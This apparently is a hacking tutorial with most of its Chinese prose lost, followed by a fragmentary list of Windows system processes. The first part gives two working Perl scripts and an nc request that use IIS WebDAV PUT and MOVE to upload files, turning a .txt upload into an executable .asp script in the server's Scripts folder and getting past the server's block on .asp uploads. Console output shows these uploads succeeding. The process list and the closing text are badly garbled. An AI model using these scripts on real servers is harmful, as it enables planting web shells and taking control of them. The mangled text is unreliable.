%^#$!~

PUT /dir/my_file.txt HTTP/1.1


Host: iis-server
Content-Length: 10
PUT URL URL

URL URL
URL
Host
HTTP
Content-Length

nctelnet perl
binmode()
#!/usr/bin/perl
use IO::Socket;
$ARGC = @ARGV;
if ($ARGC != 4)
{
print "usage:$0 127.0.0.1 80 kaka.exe /Scripts/file.exe\n";
exit;
}
$host = @ARGV[0];
$port = @ARGV[1];
$file = @ARGV[2];
$path = @ARGV[3];
@s=stat("$file");
$size = $s[7]; # local file size in bytes, used as Content-Length
print "$file size is $size bytes\n";
my $sock = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
print $sock "PUT $path HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n"; # request line and headers go out over the socket
open(FILE,"$file");
binmode(FILE); # binary mode, so a non-text file is sent unchanged
while (read(FILE,$char,1024)) { # send the file body in 1024-byte chunks
print $sock "$char";
}
print $sock "\n\n";
@req = <$sock>;
print "please wait...\n";
sleep(2);
if ($req[4]=~/200|201/){
print "upfile Succeed!!!" ; # server answered 200 or 201
}
else{
print "upfile faile!!!\n\n";
print @req; # show the server's reply for diagnosis
}
close $sock;
close FILE;

C:\usr\bin>perl.exe

iiswt.pl

/Scripts/kaka.txt
kaka.txt size is 14 bytes
please wait...
upfile Succeed!!!

127.0.0.1

80

kaka.txt

C:\Inetpub\Scripts>dir kaka.txt
C

3CD1-479E
C:\Inetpub\Scripts
2004-05-05 00:37 14 kaka.txt
1 14
0 3,871,080,448

kaka.txt web Scripts

binmode()
2 exe
C:\usr\bin>perl.exe

iiswt.pl

127.0.0.1

80

perl.exe

/Scripts/perl.exe
perl.exe size is 20535 bytes
please wait...
upfile Succeed!!!
C:\Inetpub\Scripts>dir perl.exe
C

3CD1-479E
C:\Inetpub\Scripts
2004-05-05 00:42 20,535 perl.exe
1 20,535
0 3,871,031,296

exe asp
C:\usr\bin>perl.exe

iiswt.pl

127.0.0.1

/Scripts/kaka.asp
kaka.asp size is 4 bytes
please wait...
upfile faile!!!
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Tue, 04 May 2004 16:45:51 GMT

80

kaka.asp

HTTP/1.1 403 Forbidden


Server: Microsoft-IIS/5.0
Date: Tue, 04 May 2004 16:45:51 GMT
Connection: close
Content-Type: text/html
Content-Length: 44
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden

post

asp

iis
HTTP/1.1 403 Forbidden
iis iis
putpostget

COPY, MOVE
asp web txt

copymove asp
nc
D:\>nc 127.0.0.1 80
MOVE /scripts/kaka.txt HTTP/1.1
Host:127.0.0.1
Destination: http://127.0.0.1/scripts/kaka.asp
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Sun, 05 Oct 2003 09:30:59 GMT
Location: http://127.0.0.1/scripts/x.asp
Content-Type: text/xml
Content-Length: 0
MOVE /scripts/kaka.txt /scripts/kaka.asp
put move iis :)perl
asp
C:\usr\bin>perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
************************************************************
codz by SuperHei && lanker
************************************************************

kaka.asp size is 4 bytes


please wait...
upfile Succeed!!!
Modifyfile Succeed!!!
iiswrite.pl

lanker THX lanker


#!/usr/bin/perl
#The iiswrite Script
use IO::Socket;
$ARGC = @ARGV;
print "*" x 60;
print "\ncodz by SuperHei && lanker\n";
print "*" x 60,"\n";
if ($ARGC != 4)
{
print "usage:$0 127.0.0.1 80 kaka.txt /scripts/my_file.txt\n";
exit;
}
$host = @ARGV[0];
$port = @ARGV[1];
$path = @ARGV[3];
$file = @ARGV[2];
# split the target path into its directory ($path1) and file name ($any)
@path=split("/",$path);
$any = pop(@path);
$path1=join("/",@path);
@s=stat("$file");
$size = $s[7];
print "$file size is $size bytes\n";
my $sock = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
# step 1: PUT the content under a .txt name in the target directory
print $sock "PUT $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n";
open(FILE,"$file")|| die "Can't open $file";
binmode(FILE);
while (read(FILE,$char,1024)) {
print $sock "$char";
}
print $sock "\n\n";
@req = <$sock>;
print "please wait...\n";
sleep(2);
if ($req[4]=~/200|201/){
print "upfile Succeed!!!\n" ;
}
else{
print "upfile faile!!!\n";
}
close $sock;
close FILE;
# step 2: MOVE the .txt to the requested name on a fresh connection
my $sock = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
print $sock "MOVE $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Destination:http://$host:$port$path\n\n\n\n";
@req = <$sock>;
if ($req[0]=~/20\d/){ # any 2xx status line means the MOVE was accepted
print "Modifyfile Succeed!!!" ;
}
else{
print "Modifyfile faile!!!";
}
close $sock;
28
1[system Idle Process]

: [system process] or [system process]


: Windows

: Windows



cpu CPU
CPU
2[alg.exe]

: alg or alg.exe
:
:
Internet Internet

3[csrss.exe]

: csrss or csrss.exe
: Client/Server Runtime Server Subsystem
:

Windows
: Win32 csrss /

csrss

Windows 16 MSDOS

4[ddhelp.exe]

: ddhelp or ddhelp.exe
: DirectDraw Helper
: DirectDraw Helper DirectX

Directx
5[dllhost.exe]

: dllhost or dllhost.exe
: DCOM DLL Host

: DCOM DLL Host COM DLL Windows


com dll dllhost cpu
8
6[explorer.exe]

: explorer or explorer.exe
:
: Windows Program Manager Windows Explorer

Windows
Shell
shell
windows

c d
explorer.exe
7[inetinfo.exe]

: inetinfo or inetinfo.exe
: IIS Admin Service Helper
: InetInfo Microsoft Internet Infomation Services (IIS)

Debug
IIS

inetinfo.exe
8[internat.exe]

: internat or internat.exe
: Input Locales
:
internat.exe
HKEY_USERS\.DEFAULT\Keyboard Layout\Preload

internat.exe EN


EN
internat.exe internat

9[kernel32.dll]

: kernel32 or kernel32.dll
: Windows

: Windows

Kernel32

10[lsass.exe]

: lsass or lsass.exe
:
: Windows

IP
ISAKMP/Oakley (IKE) IP

winlogon
msgina.dll
lsass
shell windows

LDAP 3
1000 "AND"
Lsass.exe

30


11[mdm.exe]

: mdm or mdm.exe
: Machine Debug Manager
: Debug Microsoft Office
Microsoft
Script Editor
Mdm.exe (Debug)
fff 0 mdm.exe

fff CHK
?X

Mdm.exe

fff Mdm.exe
fff Ctrl+Alt+Del
Mdm Mdm.exe Mdm.exe(
C:\Windows\System ) Mdm.bak msconfig
Machine Debug Manager Mdm.exe
msconfig IE
5.X (Internet
) fff
12[mmtask.tsk]

: mmtask or mmtask.tsk
:
: Windows MIDI

13[mprexe.exe]

: mprexe or mprexe.exe
: Windows

: Windows
Windows 32
A-311 (Trojan.A-311.104)

mprexe.exe

14[msgsrv32.exe]

: msgsrv32 or msgsrv32.exe
: Windows
: Windows Windows
msgsrv32.exe win9x
msgsrv32.exe

15[mstask.exe]

: mstask or mstask.exe
: Windows

: Windows

win9X

16[regsvc.exe]

: regsvc or regsvc.exe
:

17[rpcss.exe]

: rpcss or rpcss.exe
: RPC Portmapper
: Windows RPC

RPC

()

98

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

"

"

"C:\WINDOWS\SYSTEM\RPCSS"
18[services.exe]

: services or services.exe
: Windows Service Controller
: Windows

%systemroot%\system32\service.exe
19[smss.exe]

: smss or smss.exe
: Session Manager Subsystem
: MS-DOS
LPT1 COM Win32

Windows

WinlogonWin32Csrss.exe
Winlogon Csrss
smss.exe

20[snmp.exe]

: snmp or snmp.exe
: Microsoft SNMP Agent
: Windows SNMP

SNMP WinsockAPI
21[spool32.exe]

: spool32 or spool32.exe
: Printer Spooler
: Windows
22[spoolsv.exe]

: spoolsv or spoolsv.exe
: Printer Spooler Service
: Windows
spooler
23[stisvc.exe]

: stisvc or stisvc.exe
: Still Image Service
: Still Image Service

Windows
24[svchost.exe]

: svchost or svchost.exe
: Service Host Process
: Service Host Process .
Svchost.exe

Svhost.exe %systemroot%\system32
Svchost.exe
Svchost.exe

Svchost.exe

Svchost.exe
windows 2k 2 svchost

RPCSSRemote Procedure Call


svchost.exe windows XP

4
svchost.exe

windows 2003 server

25[taskmon.exe]

: taskmon or taskmon.exe
: Windows Task Optimizer
: windows

26[tcpsvcs.exe]

: tcpsvcs or tcpsvcs.exe
: TCP/IP Services
: TCP/IP Services Application TCP/IP Internet
27[winlogon.exe]

: winlogon or winlogon.exe
: Windows Logon Process
: Windows NT
winlogon CTRL+ALT+DEL
28[winmgmt.exe]

: winmgmt or winmgmt.exe

: Windows Management Service


: Windows Management Service Windows Management
Instrumentation data WMI)
winmgmt win2000
WinMgmt.exeCIM
Repository WMI

WMI
WinMgmt.exe Windows 2k/NT Windows
95/98 exe Windows 2k
WMI

Windows 2k SP2
29[system]

: system or system
: Windows System Process
: Microsoft Windows

Windows2k/XP

smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe, svchost.exe (), spoolsv.exe, explorer.exe, System Idle Process


Windows 9x

msgsrv32.exe, mprexe.exe, mmtask.tsk, kernel32.dll
29

(1997 12 11 1997 12 30


()
()
()
()
()
()
()
()
()

()
()
()

()
()

()
()
()

()

()
()

()

()

()()()
